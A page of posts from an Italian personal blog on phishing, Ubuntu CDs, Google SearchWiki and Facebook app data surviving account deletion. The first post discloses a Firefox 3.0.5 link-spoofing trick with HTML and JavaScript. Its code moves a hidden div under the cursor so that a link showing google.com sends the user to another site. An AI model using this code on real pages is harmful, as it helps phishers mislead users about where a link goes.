Andrea Lazzari's blog

Il phishing è uno dei fenomeni (di sicurezza) di massa che attualmente affligge il mondo dell’utenza internet, lo diceva due anni fa gartner ed oggi siamo proprio nella “mainstream adoption”:

London, UK, September 18, 2006 — Gartner, Inc. today advised businesses to plan for five increasingly prevalent cyberthreats that have the potential to inflict significant damage on organisations during the next two years. They are; targeted threats, identity theft, spyware, social engineering and viruses.

via New Gartner Hype Cycle Highlights Five High Impact IT Security Risks.

tratto da http://en.wikipedia.org/wiki/Phishing

(Maggiori report dall’APWG)

Ma come perpetuare un attacco di questo tipo?

Visto che oggi più che mai mi sento per la full disclosure, non vi farò attendere troppo

Se fossi un attaccante e volessi fare del phishing il primo problema che mi si pone è quello di non mettere in allerta l’attaccato. Purtroppo, o per fortuna, i vecchi metodi di link manipulation fanno scattare tutti gli strumenti di alerting che abbiamo più o meno installato sulla macchina… allora? Come fare?

ClickJacking: ovvero come offuscare la barra di un browser (nell’esempio firefox) per nascondere il sito target

Una div :

<div id="mydiv"
onmouseover="document.location='http://freeuser.org';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>

una semplice function JS:

<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>

ed un onclick:

<a href="http://www.google.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a>

… garantiscono il risultato

Pagina Html di Test

Provare per credere, buona serata

PS: La “vulnerabilità” è data per FireFox 3.0.5 … io uso la 3.1beta2 tirate voi le vostre conclusioni!

Il nuovo layout di Google Reader è veramente brutto … Punto!

Come è consuetudine dall’ormai andato 2005 mi permetto di richiedere alla Canonical copia “fisica” della distro linux che tanto gli/mi sta a cuore, Ubuntu con lo scopo di diffonderne il più possibile l’utilizzo e devo dire che la cosa mi è sempre più o meno riuscita tra i corsi e tutto il resto.

Ultimamente poi ho esigenze un pò differenti e devo dare spazio anche all’immagine…

presentarsi in seno ad un’azienda con un CD/DVD masterizzato di una distro non è sempre vista (purtroppo) come una cosa professionale. (mentre se sul CD/DVD troviamo masterizzato windows quello si che è professional!! ndr)

Per non divagare troppo vi chiedo … chi ne vuole una copia?

… intendo proprio questo

Advanced Beauty 18 of 18 / Directed by Universal Everything from Universal Everything on Vimeo.

Detto… fatto!

Have you ever wanted to mark up Google search results? Maybe you’re an avid hiker and the trail map site you always go to is in the 4th or 5th position and you want to move it to the top. Or perhaps it’s not there at all and you’d like to add it. Or maybe you’d like to add some notes about what you found on that site and why you thought it was useful. Starting today you can do all this and tailor Google search results to best meet your needs.

[Via Official Google Blog: SearchWiki: make search your own]

Molto semplicemente posso dirvi che:

- Google SearchWiki non modifica (per ora ndr) in alcun modo il ranking delle pagine, che si traduce in un “Nessuno gioverà delle modifiche ai risultati modificati se non colui che le ha effettuate” … però

- Sarà permesso leggere i commenti lasciati dalle altre persone in merito ad un ricerca

Quanto tempo passerà prima che l’algoritmo di PageRank verrà ritoccato “socialmente”?

Tutto questo mi ricorda spaventosamente wikia, ne parlai tempo fà, con una differenza sostanziale, la knowledge base

Secondo voi ho detto di si?!

Ma cos’è oggi Natale?

Notate niente di strano accanto ai link dei risultato proposti?

Anche sui vostri browser compaiono i tastini “Promote” “Remove” e “Comment”?

Qui una indagine è assolutamente necessaria

Sono giorni che continuo a ricevere mail dalle vecchie applicazioni a cui ero registrato sotto Facebook e qui è cominciato a sorgermi qualche maledetto dubbio …

Dopo svariate mail al supporto opto per una estrema ratio, (ri)registro il mio vecchio account e cosa ti trovo? Tutte le applicazioni sono lì che mi attendono. SGOMENTO

Profilo e “friend list” sono vuote per fortuna ma le apps sono lì tutte!

A quanto pare le informazioni che vengono estrapolate dalle apps fanno troppa gola alle api di questo social framework. La procedura di cancellazione del mio profilo è andata a buon fine a quanto pare, ma le informazioni correlate sono ancora lì…

Che abbiano fatto il restore di qualche backup dove era presente il mio acco? Sarebbe da scrivere sul prontuario delle leggi di Murphy

Per quanto ci si possa prodigare nella cancellazione di un account Facebook ci sarà sempre qualche restore che ne riattiverà le componenti

Non so se ridere o piangere

NB: Se optate per la cancellazione dell’account prendetevi la bega di eliminare tutte le apps a mano

YouTube – “Star Wars” – an a capella tribute to John Williams.

Semplicemente geniale, e soprattutto adoro i “Recomended for you“